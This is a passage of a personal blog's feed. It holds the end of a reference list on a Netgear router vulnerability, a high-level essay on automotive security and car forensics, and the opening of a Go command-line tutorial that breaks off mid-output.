&lt;p&gt;Details, C. (2016). Vulnerability details : Cve-2016-1555. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;www.cvedetails.com&#x2F;cve&#x2F;CVE-2016-1555&#x2F;&quot;&gt;https:&#x2F;&#x2F;www.cvedetails.com&#x2F;cve&#x2F;CVE-2016-1555&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Heffner, C., &amp;amp; Yap, D. (2009). Security vulnerabilities in soho routers.&lt;&#x2F;p&gt;
&lt;p&gt;ide0x90. (2018). Metasploit module for cve-2016-1555. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;ide0x90&#x2F;cve-2016-1555&#x2F;&quot;&gt;https:&#x2F;&#x2F;github.com&#x2F;ide0x90&#x2F;cve-2016-1555&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Netgear. (2020). Netgear firmware download - wnap320v2.0.3. Retrieved from &lt;a rel=&quot;external&quot; href=&quot;http:&#x2F;&#x2F;www.downloads.netgear.com&#x2F;files&#x2F;GDC&#x2F;WNAP320&#x2F;WNAP320%20Firmware%20Version%202.0.3.zip&quot;&gt;http:&#x2F;&#x2F;www.downloads.netgear.com&#x2F;files&#x2F;GDC&#x2F;WNAP320&#x2F;WNAP320%20Firmware%20Version%202.0.3.zip&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
&lt;p&gt;OWASP. (2020). Cross site scripting (xss). Retrieved from &lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;owasp.org&#x2F;www-community&#x2F;attacks&#x2F;xss&#x2F;&quot;&gt;https:&#x2F;&#x2F;owasp.org&#x2F;www-community&#x2F;attacks&#x2F;xss&#x2F;&lt;&#x2F;a&gt;&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Automotive security in broad strokes</title>
        <published>2019-04-07T00:00:00+00:00</published>
        <updated>2019-04-07T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/automative-security-broad-strokes/"/>
        <id>https://maxine.dev/post/automative-security-broad-strokes/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/automative-security-broad-strokes/">&lt;p&gt;Along with most of our devices, cars have also become &quot;smarter&quot; and more connected. With this, like with any other device that introduces more functionality, there is a potential to exploit these functions.&lt;&#x2F;p&gt;
&lt;p&gt;Hacking automotive devices can be a very alienating experience compared to other devices. For example, while an internet-connected fire alarm might seem radically different in design to an internet-connected lightbulb, they function very similarly in terms of the underlying technology that makes them connected. Indeed, the aforementioned IoT devices are likely to use the MQTT protocol likely on top of TCP&#x2F;IP; a design which is likely to be familiar to many. One way which makes automotive security radically different is the issue of communication. Indeed, many of the protocols that are commonly used in the automotive industry such as Controller Area Network (CAN) and Local Interconnect Network (LIN). However, more widely used protocols are also used in vehicles such as I2C and SPI. A common theme between all these technologies is that they are fairly low level with efficiency as an aim, and as will be demonstrated, also have to be interfaced with on a low level. Hence, a particular (and to many a novel) set of skills are required to efficiently assess these automotive systems.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;previous-security-issues&quot;&gt;Previous security issues&lt;&#x2F;h2&gt;
&lt;p&gt;At the time where cars were not connected to the internet (or any other wireless protocol for that matter), one could safely assume that the on-board electronics in the car were relatively safe. That is unless a proper attempt at getting access to the internals of the car (such as the ECU) (Wenzel, 2017). These systems can be in today&#x27;s standards often be regarded as very rudimentary, with some of their only functions being limited to automobile emissions and to calculate optimal fuel usage. One may say that the danger of having an exploited automotive system was not likely at this point bin time, a far greater number of things could be done through other means, such as manually disabling the brakes.&lt;&#x2F;p&gt;
&lt;p&gt;With the advent of wirelessly connected automotive systems, however, physical access is not necessarily required to exploit said systems.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;current-security-issues&quot;&gt;Current security issues&lt;&#x2F;h2&gt;
&lt;h3 id=&quot;wireless-connectivity&quot;&gt;Wireless connectivity&lt;&#x2F;h3&gt;
&lt;p&gt;There are examples of vehicles being exploited in recent years.&lt;&#x2F;p&gt;
&lt;p&gt;In July of 2015, the car &quot;Jeep Cherokee&quot; was remotely hacked by Charlie Miller and Chris Valasek by wirelessly accessing its entertainment system. This allowed them to send commands to the car&#x27;s internal instruments that controlled the brakes, transmission, steering wheel as well as various dashboard functions. According to the aforementioned researchers, the vehicle in question behaved more like akin to a smartphone than one would expect a car to behave. As such, it was wide open to be exploited much like a modern smartphone. In the scenario of the aforementioned car, it was also possible to connect the exploited device to the internet as it the car connected with the driver&#x27;s mobile network shared through their smartphone&#x27;s Wi-Fi hotspot (Pagliery, 2015). Similarly, researchers at the University of California, San Diego, demonstrated the feasibility of exploiting a vehicle by the manufacturer Chrystler by using a gadget commonly utilised by insurance firms to monitor the lessee&#x27;s speed and location. Through creating malicious SMS messages to this gadget, commands were sent to the CAN bus of the can which subsequently could toggle functions such as brakes or windscreen wipers(Pagliery, 2015).&lt;&#x2F;p&gt;
&lt;p&gt;Tesla&#x27;s Model X experienced a vulnerability during the summer of 2017. This vulnerability enabled researchers to remotely take control over the brakes of the Model X whilst also opening the trunk, doors as well as changing settings on the infotainment system of the vehicle. Tesla responded to this vulnerability with a security update (Cimpanu, 2017).&lt;&#x2F;p&gt;
&lt;p&gt;As demonstrated by these examples, we can see that wireless connectivity is a common theme where vulnerabilities happen. With that in mind, as well as considering that this development does not seem to stagnate, investing in wireless security is paramount. In addition, as will be discussed, self-driving vehicles are expected to become more common. In this future scenario, one may expect that wireless automotive security is the most important issue to investigate.&lt;&#x2F;p&gt;
&lt;p&gt;One proposed technology to be applied to the car of tomorrow is vehicular ad-hoc networks (VANETs). These networks, first mentioned in 2001 (Toh, 2001), are supposed to function as small spontaneous networks that connect vehicles with other vehicles, but also roadside communication. While not technically formalised internationally (regional differences apply), in the EU the com- munication technology uses the frequency range 5 875 - 5 905 MHz per the European Commission Decision 2008&#x2F;671&#x2F;EC (Series, 2012). Standards like these are important as it focuses the collective research effort towards one single technology.&lt;&#x2F;p&gt;
&lt;p&gt;Research in the field of VANETs is well underway, however, and current research is especially invested in the Sybil attack (Kumar, Chauhan, Kumar, Chand, &amp;amp; Khan, 2020). The Sybil attack is the act of subverting a reputation system in a network by creating a plethora of fake identities. In other words, it undermines the authority of the system, potentially even take control of it. A very similar attack has happened to other areas of emerging technologies, namely the 51 per cent attack against blockchain systems (Bastiaan, 2015) which more or less achieves the same end result: depreciating value of the network as a decentralised authority.&lt;&#x2F;p&gt;
&lt;p&gt;Modern vehicles usually have some form of keyless entry, usually by a remote control which also acts as a key to start the engine. (Bacchus, Coronado, &amp;amp; Gutierrez, 2017). These types of keys have been a focus point of researchers when trying to exploit consumer vehichles.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;mobile-software-integration&quot;&gt;Mobile software integration&lt;&#x2F;h3&gt;
&lt;p&gt;Having vehicles wirelessly connect to our mobile devices introduces an entirely novel attack surface. Some newer cars, for example, Tesla&#x27;s cars, have its own dedicated mobile applications so that remote commands and settings might be issued by the user wirelessly (Tesla, 2020). With its rise in popularity, mobile devices have received increased attention from malicious actors (Tam, Feizollah, Anuar, Salleh, &amp;amp; Cavallaro, 2017) and with it the greater likelihood that it is the attack surface of choice for many. Therefore, it is vital that attention is directed towards not only the fact that a vehicle connects wirelessly but to what it connects to.&lt;&#x2F;p&gt;
&lt;p&gt;One may imagine the scenario where the application for remotely accessing one&#x27;s Tesla&#x27;s configuration has been reverse-engineered and malicious code has been deployed unto a victim&#x27;s device. The malicious code can in this case theoretically traverse the connection between the mobile application and become persistent also within the vehicle itself. Hence, one now has two devices that are compromised, but one device with far more likelihood of causing fatalities, id est the automobile.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;forensic-value&quot;&gt;Forensic value&lt;&#x2F;h2&gt;
&lt;p&gt;The potential for gathering evidence from &quot;smart cars&quot; are tremendous. It is estimated that an average &quot;smart car&quot; usually generates approximately 25GB of data per hour (O&#x27;Neill, 2017) which of course gives digital forensics investigators and researchers alike a lot of data. Indeed, this data is not limited by GPS data, but also data collected from the car&#x27;s sensors, its infotainment system and its connectivity with a smartphone. It is not difficult to imagine that this data is far more complete and diverse than what could be recovered from earlier vehicles&#x27; black boxes (Larson, 2018). Important to note is that this data is generated regardless of which person is looking at it, be it an investigator or malicious actor. Therefore, with that in mind, this humongous source of data must be protected to the utmost degree.&lt;&#x2F;p&gt;
&lt;p&gt;There are commercial efforts towards automotive forensics, one of them being Berla (Berla, 2020). While the price of Berla&#x27;s forensic solution kit is not public, one may expect that it falls in line with the general &quot;professional pricing&quot; of forensic software aimed at other devices. In general, Berla is very secretive about what the software actually is able to do and how much data its solution can actually provide (O&#x27;Neill, 2017). Hence, these tools are not very accessible to the public, something that will be discussed.&lt;&#x2F;p&gt;
&lt;p&gt;In a very similar theme as with specific tools for phones with specific operative systems, &quot;smart cars&quot; also have their fair share of custom made software solutions and procedures to tackle the forensic aspects of a vehicle. An example of this is the recent research done into the low-level data recovery from Volkswagen cars and their entertainment systems (Jacobs, Choo, Kechadi, &amp;amp; Le-Khac, 2017).From this research, it is clear how much dedicated effort towards one particular system is needed togather data. Hence, more universal solutions to the growing number and diversification of &quot;smart cars&quot; is needed. Researchers insist that learning from the past forensic analysis is vital when it comes to forensic preparedness are an essential part when venturing into the unknown lands of futuristic solutions such as &quot;smart vehicles&quot; in a &quot;smart city&quot; (Baig et al., 2017).&lt;&#x2F;p&gt;
&lt;h2 id=&quot;towards-secure-roads&quot;&gt;Towards secure roads&lt;&#x2F;h2&gt;
&lt;p&gt;One undeniable fact is that the rate automation of our automotive vehicles is not slowing down. There is a lot of both capital and research invested into a future where humans are not the one turning the steering wheels and where cars are merely an interconnected mesh-like network that conveniently coincides with an equally probable (if not required) prediction of &quot;smart cities&quot;.&lt;&#x2F;p&gt;
&lt;p&gt;There is no doubt that self-driving cars are not already comparable to humans at driving, but in many respects, they are indeed better (Teoh &amp;amp; Kidd, 2017). This implication puts those against self-driving cars (likely for valid and various reasons) in a very particular ethical dilemma: is the overall safety of the population more important than things like personal freedom to drive one&#x27;s own car; to be responsible for one&#x27;s own actions? Another dilemma is either the centralisation or decentralisation of trust that is inherently an issue with large networks. These issues bleed easily into questions one have to consider concerning how to approach the field of automated and AI automotive security.&lt;&#x2F;p&gt;
&lt;p&gt;Some of these wireless technologies that are meant to enable self-driving cars to be truly autonomous are vehicle-to-vehicle (V2V) and vehicular ad-hoc networks. As such, these technologies are heavily researched now, especially for any potential inherent vulnerability that such technologies might bring with them (Kumar et al., 2020). Concerning the not so distant future of forensics, there are also novel techniques of gathering forensic data (Obimbo, n.d.).&lt;&#x2F;p&gt;
&lt;p&gt;As mentioned, many tools to diagnose modern cars are inaccessible to the public for several reasons. However, an open-source solution is also being developed, as a response to the very costly, locked-down and proprietary solutions (Greenberg, 2015) proposed by large corporations. Efforts like these democratise security by making sure everyone can have access to it, even without connection to the car manufacturer or an external security company. Similarly, it also decentralises security by making sure that no one large actor is able to control the narrative of the discussion; possibly refrain from disclosing, or even selling, potential vulnerabilities in a vehicle. This open- source mentality is strongly intertwined with the &quot;Right to repair&quot; movement that is very relevant at the time of writing (Svensson et al., 2018). As car get less mechanical and more intertwined with computers, having both the right and the means to repair one&#x27;s own vehicle is become much more vital to ensure personal freedom over the items in one&#x27;s possession, and that said items are doing what the manufacturer is claiming they should be doing; nothing more, nothing less.&lt;&#x2F;p&gt;
&lt;p&gt;In the realm of self-driving cars, there has also been done great steps towards making self-driving cars a viable alternative to driving the car oneself. As the cornerstone of a self-driving car&#x27;s existence might be attributed to wireless technologies, these wireless are expected to be the focus of malicious actors for the purposes of exploitation. Therefore, enough attention must be given to these areas before they become an actual problem.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;conclusion&quot;&gt;Conclusion&lt;&#x2F;h2&gt;
&lt;p&gt;With the expanding market of &quot;smart vehicles&quot; and general automotive automation, the possibility of accidents if such instruments should be compromised must be kept in mind. The data that these fast-moving devices generate can prove to be a valuable resource, as long as the people that have said information are the right people with pure intentions. The unifying principle for the cases mentioned is clear: no matter what the device is, the price to pay for not having secure devices can be grave. Whether there is a complete violation of the CIA principle or a &quot;smart car&quot; exploit that leads to the fatal accident of a victim, both examples signifies their importance in their own right and are both worthy of the attention from both established researchers, digital forensic investigators and hobbyist alike. In a future where everything is moving towards &quot;smart&quot;, we have to be wise in our decisions concerning security.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;references&quot;&gt;References&lt;&#x2F;h2&gt;
&lt;p&gt;Bacchus, M., Coronado, A., &amp;amp; Gutierrez, M. A. (2017). The insights into car hacking. EEL.&lt;&#x2F;p&gt;
&lt;p&gt;Baig, Z. A., Szewczyk, P., Valli, C., Rabadia, P., Hannay, P., Chernyshev, M,... Sansurooah, K., et al. (2017). Future challenges for smart cities: Cyber-security and digital forensics. &lt;em&gt;Digital Investigation&lt;&#x2F;em&gt; , &lt;em&gt;22&lt;&#x2F;em&gt; , 3–13.&lt;&#x2F;p&gt;
&lt;p&gt;Bastiaan, M. (2015). Preventing the 51 percent-attack: A stochastic analysis of two phase proof of work in bitcoin. &lt;em&gt;Available at (http:&#x2F;&#x2F;referaat.cs.utwente.nl&#x2F;conference&#x2F;22&#x2F;paper&#x2F;7473&#x2F;preventingthe-51-attack-a-stochasticanalysis-oftwo-phase-proof-of-work-in-bitcoin.pdf&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Berla. (2020). Berla vehicle forensics. Retrieved from https:&#x2F;&#x2F;berla.co&#x2F;&lt;&#x2F;p&gt;
&lt;p&gt;Cimpanu, C. (2017). Chinese researchers hack tesla model x in impressive video. Retrieved from
https:&#x2F;&#x2F;www.bleepingcomputer.com&#x2F;news&#x2F;security&#x2F;chinese-researchers-hack-tesla-model-x-in-impressive-video&#x2F;&lt;&#x2F;p&gt;
&lt;p&gt;Greenberg, A. (2015). A $60 gadget that makes car hacking far easier. Wired.&lt;&#x2F;p&gt;
&lt;p&gt;Jacobs, D., Choo, K.-K. R., Kechadi, M.-T., &amp;amp; Le-Khac, N.-A. (2017). Volkswagen car entertainment system forensics. In &lt;em&gt;2017 ieee trustcom&#x2F;bigdatase&#x2F;icess&lt;&#x2F;em&gt; (pp. 699–705). IEEE.&lt;&#x2F;p&gt;
&lt;p&gt;Kumar, R., Chauhan, N., Kumar, P., Chand, N., &amp;amp; Khan, A. U. (2020). Privacy aware prevention of sybil attack in vehicular ad hoc networks. In &lt;em&gt;Handbook of wireless sensor networks: Issues and challenges in current scenario&#x27;s&lt;&#x2F;em&gt; (pp. 364–380). Springer.&lt;&#x2F;p&gt;
&lt;p&gt;Larson, A. (2018). What is an automobile black box. Retrieved from https:&#x2F;&#x2F;www.expertlaw.com&#x2F;library&#x2F;accidents&#x2F;auto_black_boxes.html&lt;&#x2F;p&gt;
&lt;p&gt;O&#x27;Neill, P. H. (2017). Meet berla, the little-known company that can pull smartphone data from your car. Retrieved from https:&#x2F;&#x2F;www.cyberscoop.com&#x2F;berla-car-hacking-dhs&#x2F;&lt;&#x2F;p&gt;
&lt;p&gt;Obimbo, C. (n.d.). Bb-vdf: Enabling accountability and fine-grained access control for vehicular digital forensics through blockchain.&lt;&#x2F;p&gt;
&lt;p&gt;Pagliery, J. (2015). Chryslers can be hacked over the internet. Retrieved from https:&#x2F;&#x2F;money.cnn.com&#x2F;2015&#x2F;07&#x2F;21&#x2F;technology&#x2F;chrysler-hack&#x2F;index.html&lt;&#x2F;p&gt;
&lt;p&gt;Series, M. (2012). Advanced intelligent transport systems (its) radiocommunications.&lt;&#x2F;p&gt;
&lt;p&gt;Svensson, S., Richter, J. L., Maitre-Ekern, E., Pihlajarinne, T., Maigret, A., &amp;amp; Dalhammar, C. (2018). The emerging right to repair legislation in the eu and the us. &lt;em&gt;Proceedings from Going Green - Care Innovation, Vienna&lt;&#x2F;em&gt;.&lt;&#x2F;p&gt;
&lt;p&gt;Tam, K., Feizollah, A., Anuar, N. B., Salleh, R., &amp;amp; Cavallaro, L. (2017). The evolution of android malware and android analysis techniques. &lt;em&gt;ACM Computing Surveys (CSUR)&lt;&#x2F;em&gt; , &lt;em&gt;49&lt;&#x2F;em&gt; (4), 1–41.&lt;&#x2F;p&gt;
&lt;p&gt;Teoh, E. R., &amp;amp; Kidd, D. G. (2017). Rage against the machine? google&#x27;s self-driving cars versus human drivers. &lt;em&gt;Journal of safety research&lt;&#x2F;em&gt; , &lt;em&gt;63&lt;&#x2F;em&gt; , 57–60.&lt;&#x2F;p&gt;
&lt;p&gt;Tesla. (2020). Mobile app overview | tesla. Retrieved from https:&#x2F;&#x2F;www.tesla.com&#x2F;support&#x2F;energy&#x2F;powerwall&#x2F;mobile-app&#x2F;mobile-app-overview&lt;&#x2F;p&gt;
&lt;p&gt;Toh, C. K. (2001). &lt;em&gt;Ad hoc mobile wireless networks: Protocols and systems&lt;&#x2F;em&gt;. Pearson Education.&lt;&#x2F;p&gt;
&lt;p&gt;Wenzel, S. L. (2017). Not even remotely liable: Smart car hacking liability. &lt;em&gt;U. Ill. JL Tech. &amp;amp; Pol&#x27;y&lt;&#x2F;em&gt; , 49.&lt;&#x2F;p&gt;
</content>
        
    </entry>
    <entry xml:lang="en">
        <title>Go CLI tutorial</title>
        <published>2018-06-14T00:00:00+00:00</published>
        <updated>2018-06-14T00:00:00+00:00</updated>
        
        <author>
          <name>
            
              maxine.dev
            
          </name>
        </author>
        
        <link rel="alternate" type="text/html" href="https://maxine.dev/post/go-cli-tutorial/"/>
        <id>https://maxine.dev/post/go-cli-tutorial/</id>
        
        <content type="html" xml:base="https://maxine.dev/post/go-cli-tutorial/">&lt;p&gt;&lt;img src=&quot;&#x2F;images&#x2F;gocli1.png&quot; alt=&quot;Go CLI tutorial&quot; &#x2F;&gt;&lt;&#x2F;p&gt;
&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;There already exists many third-party packages that you can use to create command line interfaces in Go, but this tutorial is going to focus on making CLIs using only the standard library.&lt;&#x2F;p&gt;
&lt;p&gt;In other words, &quot;build your own fucking birdfeeder&quot;.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;github.com&#x2F;vagnes&#x2F;go-cli-tutorial&quot;&gt;All files presented can be found on my GitHub&lt;&#x2F;a&gt;.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;getting-started&quot;&gt;Getting started&lt;&#x2F;h2&gt;
&lt;p&gt;We are going to use three main standard library packages for this tutorial:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;golang.org&#x2F;pkg&#x2F;fmt&#x2F;&quot;&gt;fmt&lt;&#x2F;a&gt; - Formatting simple I&#x2F;O&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;golang.org&#x2F;pkg&#x2F;flag&#x2F;&quot;&gt;flag&lt;&#x2F;a&gt; - CLI flag parsing&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;golang.org&#x2F;pkg&#x2F;os&#x2F;&quot;&gt;os&lt;&#x2F;a&gt; - Platform independent OS functionality&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;This tutorial assumes basic knowledge of Go, but should be pretty easy to understand regardless.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;simple-cli&quot;&gt;Simple CLI&lt;&#x2F;h2&gt;
&lt;p&gt;Let&#x27;s first make a CLI without flags, which would be the simplest CLI we could make:&lt;&#x2F;p&gt;
&lt;p&gt;ref. 1-1&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;go&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;package&lt;&#x2F;span&gt;&lt;span style=&quot;color: #000000;background-color: #FFFFFF;&quot;&gt; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;text-decoration: underline;&quot;&gt;main&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;import&lt;&#x2F;span&gt;&lt;span&gt; (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;fmt&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;os&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;func&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; main&lt;&#x2F;span&gt;&lt;span&gt;() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    programName&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span&gt; os.Args[&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;0&lt;&#x2F;span&gt;&lt;span&gt;]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Program name: &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%s\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, programName)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;a rel=&quot;external&quot; href=&quot;https:&#x2F;&#x2F;golang.org&#x2F;pkg&#x2F;os&#x2F;#pkg-variables&quot;&gt;os.Args&lt;&#x2F;a&gt; holds the CLI arguments, which starts with the program name as its first string in the slice, and then continues with the supplied arguments.&lt;&#x2F;p&gt;
&lt;p&gt;We can demonstrate this with the following snippet of code.&lt;&#x2F;p&gt;
&lt;p&gt;ref 1-2&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;go&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;package&lt;&#x2F;span&gt;&lt;span style=&quot;color: #000000;background-color: #FFFFFF;&quot;&gt; &lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;text-decoration: underline;&quot;&gt;main&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;import&lt;&#x2F;span&gt;&lt;span&gt; (&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;fmt&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;	&amp;quot;os&amp;quot;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;func&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt; main&lt;&#x2F;span&gt;&lt;span&gt;() {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;    for&lt;&#x2F;span&gt;&lt;span&gt; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt; 0&lt;&#x2F;span&gt;&lt;span&gt;; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;&amp;lt;&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;5&lt;&#x2F;span&gt;&lt;span&gt;; i&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt;++&lt;&#x2F;span&gt;&lt;span&gt; {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		programName&lt;&#x2F;span&gt;&lt;span style=&quot;color: #F92672;&quot;&gt; :=&lt;&#x2F;span&gt;&lt;span&gt; os.Args[i]&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;		fmt.&lt;&#x2F;span&gt;&lt;span style=&quot;color: #A6E22E;&quot;&gt;Printf&lt;&#x2F;span&gt;&lt;span&gt;(&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;Argument No. : &lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%d&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt; (&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;%s&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;)&lt;&#x2F;span&gt;&lt;span style=&quot;color: #AE81FF;&quot;&gt;\n&lt;&#x2F;span&gt;&lt;span style=&quot;color: #E6DB74;&quot;&gt;&amp;quot;&lt;&#x2F;span&gt;&lt;span&gt;, i, programName)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;	}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;It will have the following output:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #F8F8F2; background-color: #272822;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;go run 1-2.go foo bar&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Argument No. : 0 (&#x2F;tmp&#x2F;go-build501384166&#x2F;command-line-arguments&#x2F;_obj&#x2F;exe&#x2F;1-2)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Argument No. : 1 (foo)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;Argument No. : 2 (bar)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;panic: runtime error: index out of range&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;goroutine 1 [running]:&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;panic(0x4db1e0, 0xc82000e070)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;        &#x2F;usr&#x2F;lib&#x2F;go-1.6&#x2F;src&#x2F;runtime&#x2F;panic.go:481 +0x3e6&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;main.main()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
